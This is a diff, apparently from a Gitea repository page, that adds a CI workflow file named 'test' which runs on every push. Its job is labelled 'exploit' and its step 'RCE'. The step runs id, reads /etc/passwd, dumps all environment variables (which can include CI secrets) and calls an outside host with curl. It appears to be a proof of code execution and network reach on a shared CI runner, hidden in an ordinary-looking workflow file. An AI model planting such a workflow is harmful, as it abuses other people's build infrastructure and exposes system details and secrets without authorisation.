12
.gitea/workflows/ci.yml
Normal file
12
.gitea/workflows/ci.yml
Normal file
@@ -0,0 +1,12 @@
|
||||
name: test
|
||||
on: [push]
|
||||
jobs:
|
||||
exploit:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: RCE
|
||||
run: |
|
||||
id
|
||||
cat /etc/passwd
|
||||
env
|
||||
curl http://api.hikka.host/api/statistic | head -c 100
|
||||
Reference in New Issue
Block a user